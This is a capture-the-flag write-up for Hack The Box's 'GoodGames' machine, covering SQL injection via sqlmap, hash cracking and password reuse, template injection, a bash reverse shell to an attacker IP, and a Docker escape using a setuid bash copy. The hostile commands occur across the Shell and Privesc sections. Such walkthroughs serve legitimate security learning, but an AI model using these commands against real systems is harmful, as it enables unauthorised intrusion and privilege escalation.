HTB [GoodGames]
#linux#sqli#password-reuse#ssti#docker-escape
Recon
port scan
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.51
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
|_http-favicon: Unknown favicon MD5: 61352127DC66484D3736CACCF50E7BEB
|_http-title: GoodGames | Community and Store
Service Info: Host: goodgames.htb
- Only a single port opened o.O
- Ok let’s enum the website and scan for UDP ports in the background
- Add
goodgames.htb
to your/etc/hosts
file
web enum
- It’s a flask application
- There’s a signup page, let’s create a new account and login
- My name and email are reflecting here, so let’s try for a SSTI
- There’s no SSTI in username & email field
Forget password
- It works normally
SQLi
- SSTI not worked here, so let’s try for SQL Injection
sqlmap -u "http://goodgames.htb/login" --method=POST --data "email=a&password=a"
- Cool let’s dump the db
available databases [2]:
[*] information_schema
[*] main
- Let’s use the main database
[3 tables]
+---------------+
| user |
| blog |
| blog_comments |
+---------------+
- user seems interesting
[4 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| email | varchar(255) |
| id | int |
| name | varchar(255) |
| password | varchar(255) |
+----------+--------------+
- Dump all these things
- only the first one is in the box, other 5 accounts are mine, used to check ssti
- let’s crack the hash
2b22337f218b2d82dfc3b6f77e7cb8ec
- login with these creds
admingoodgames.htb:superadministrator
- There’s a settings button in the profile page, it’s not available for normal users
- And clicking that redirects us to
http://internal-administration.goodgames.htb/
- Let’s add this to our
/etc/hosts
file
Shell
Internal-Administration
- Let’s use the password that we got from the sqli,
admin:superadministrator
- Successfully logged in
- In settings pannel we can able to do a SSTI
- Now let’s try to get a rev shell
- The output says
uid = 0 (root)
so most likely it’s a docker container - Start a python server and serve a file named shell.sh
bash -c 'exec bash -i &>/dev/tcp/10.10.14.3/1337 <&1'
- As I said earlier, we got shell as a docker container
- There’s a user named
augustus
, you can grab the user.txt file from his home folder
Privesc
.2
is the docker IP, and.1
is always the host and it’s the machine IP- I’m going to upload a static nmap binary to scan all the internal ports of that IP
- Here is the link to download that binary
- Looks like firewall blocking us to access ssh, but we can access it from the docker
- It’s a guess that both machines have the same user called
augustus
, using the same password allows us to ssh into the host machine - Enumerating the machine gives us nothing
- I’ve checked for all services, nothing seems interesting
- But it’s wiered that we got the users home directory in the docker container
- Seems the file system is mounted with it
- Logout us augustus and go back to the docker container
- Create a
id_rsa
file usingssh-keygen
command - But that method failed, coz the root folder is for docker it’s not mounted (See #beyond root part for more understanding)
- So let’s copy the bash binary to our
agustus
home folder and giveu+s
(setuid) permissions for that
cp /bin/bash .
- Do this us
augustus
- Then go back to the docker container
chown root:root /home/augustus/bash
chmod u+s /home/augustus/bash
- Do this as root user in docker container
- Now
./bash -p
for the root - Really It’s a good game as the name of the machine
Beyond root
- Let’s go back to the docker container and chek for the mounted folders, run the command
mount
- Looks like the home folder of the
augustus
is mounted to the docker container - That’s why we can able to change the permissions of the bash binary that has been copied to
augustus
’ home folder - Hope you’ve liked this writeup, cya soon :)
It would be appreciated if you give me a respect+ on HTB